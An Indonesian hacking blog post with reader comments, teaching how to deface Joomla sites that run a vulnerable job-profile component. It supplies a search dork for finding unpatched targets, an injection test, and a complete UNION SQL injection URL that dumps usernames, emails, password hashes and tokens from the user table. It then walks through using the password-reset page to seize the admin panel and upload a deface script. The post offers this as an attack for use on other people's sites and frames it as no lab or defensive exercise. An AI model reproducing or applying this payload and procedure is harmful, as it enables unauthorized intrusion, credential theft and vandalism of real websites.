Cara Deface Hacked Joomla SQL Injection Vulnerability dengan teknik gabungan Exploit +UNION

Cara Deface Hacked Joomla SQL Injection Vulnerability dengan teknik gabungan Exploit +UNION



Malam sahabat ROG, masih ada suaranya-?
Hohoho…. Bercanda, sob..
Yesudah jangan lama-lama bercandanya. SERIUS niih…
hehehe…

Kali ini Rafi Orilya Groups akan berbagi tutorial Hack Joomla SQL Injection Vulnerability dengan teknik gabungan Exploit.
Pertama-tama kami beri wawasan mengenai deface itu.
Deface adalah mengubah suatu tampilan, jadi Deface Web adalah mengubah tampilan web tersebut sesuai keinginan kita. Hehehe.. :D, mau diganti foto gue juga gapapa… wkakaka…
Yang penting happy…

Yang dibutuhkan adalah :
1. Dork-dork yang kreatif sesuai target
2. Kesabaran dalam mencari web target yang belum ter Patch

hanya itu yang kita butuhkan dalam mendeface suatu web.
Mungkin banyak sekali defacer-defacer Indonesia yang sudah akrab ditelinga kita, tapi bagaimana mereka melakukan itu-? (itulah yang kita pikirkan)
Baik… kami berbagi tutor bagaimana salah satu dari mereka melakukan Deface pada web dengan mencari celah pada web tersebut.

baik…. Ikuti langkah-langkah dibawah :

* Langkah pertama yang harus kita lakukan adalah mencari target.
Silahkan gunakan dork dibawah untuk mencari target :
Dork => inurl:"index.php?option=com_jobprofile”
Dork bisa kalian ganti sesuai kreatifitas sobat…
Dork digunakan dimesin pencari Goole (Google Serba Tahu)
* Selanjutnya kita cek web tersebut apakah bisa kita lanjutkan ke tahap selanjutnya.
Silahkan tambahkan ( – ) sebelum nomor ID
Contoh :
http://www.target.com/index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=-1
Atau tambahkan tanda ( ‘ ) pada akhir Number ID
JIka muncul pesan “Eror” kita lanjutkan ke langkah selanjutnya

* Selanjutnya kita Exploitasi web tersebut dengan Exploit dibawah :
Silahkan gabungkan exploitnya :
+union+all+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9+from+jos_users–

Letakan diakhir URL tersebut sehingga akan menjadi :
http://www.target.com/index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=-1+union+all+select+1,concat_ws(0x3a,id,name,username,email,password,usertype,block,sendEmail,gid,registerDate,lastvisitDate,activation,params),3,4,5,6,7,8,9+from+jos_users--
Nahh disitu akan keluar Email dan Tokennya silahkan copy dan simpan baik-baik.
Jangan sampe diambil sama pacar.
WOOOWW.. :D

* Sekarang kita masuk ke halaman reset password :
kita tambahkan : /index.php?option=com_user&view=reset
Contoh :  http://www.target.com/index.php?option=com_user&view=reset

Oke dah, masukin email dan passwordnya yang tadi.
Sekarang masuk ke control panel web tersebut.
Silahkan ubah html pada web tersebut.
Atau bisa juga sobat masukkan/ upload Script deface sobat.

Perhatian!!!
Kalau tokennya mengandung symbol 
$$$$ (Salt) maka token tidak akan bekerja.
Jadi cari target yang lain saja.


Saya bukan master Defacer jadi mohon maaf jika ada kesalahan atau salah kata dari saya, semoga postingan kali ini bermanfaat bagi sobat.
Baik pula jika memberikan komentar dibawah.

Artikel DIlindungi
Sertakan alamat blog ini jika mengcopy paste
(Hak Cipta Dilindungi)


Terima Kasih
Rafi Orilya Groups
by Rafi Aldiansyah Asikin

12 komentar

  1. wew kk hekel y?ajarin dunk...oh ea k,low g salah stepnya ada yg ilang.tu brfungsi low celahnya pada union 2.yg q tanyain apa angka union yg keluar akan slalu angka 2?makasih sbelumnya mohon di bales ke msg fb https://www.facebook.com/beby.crew.style atau sms k 083606558216 mksh sblumbya

    BalasHapus
  2. saya bukan hacker saya cuma mempelajari.. hal yang bermanfaat-
    engga mas... kan sesuai cek union target web yg mas cari-union.nya

    BalasHapus
  3. kaka ijin copas ditunggu kunbalnya salam persaudaraanya.

    BalasHapus
    Balasan
    1. iyaah, silahkan... sumbernya yaah jangan lupa

      Hapus
  4. Ini beda dengan yang sebelumnya ya mas?? wahh

    BalasHapus
  5. Banyak newbie hacker yang experiment hack web bangsanya sendiri, Mohon Jangan di salah gunakan ilmu hack, jangan sampe hack merugikan bangsa sendiri...

    BalasHapus
    Balasan
    1. Betul sekali semoga bisa memberikan perlindungan lebih bagi web nasional :)

      Hapus
  6. kunjungi balik gan votraxs.blogspot.co.id

    BalasHapus

Komentar anda sangat dibutuhkan bagi kemajuan kami untuk terus berkarya.
Diharapkan :
* Berkomentarlah dengan bahasa yang baik
* Tidak ada unsur SARA, SPAM, PORNO
* Tidak merugikan orang lain
* Menunjukkan identitas yang jelas bukan Anonim

Diperkenankan :
* Komentar promosi link web anda
* Kritik & Saran

[Protected] by DMCA Protection Pro™
EmoticonEmoticon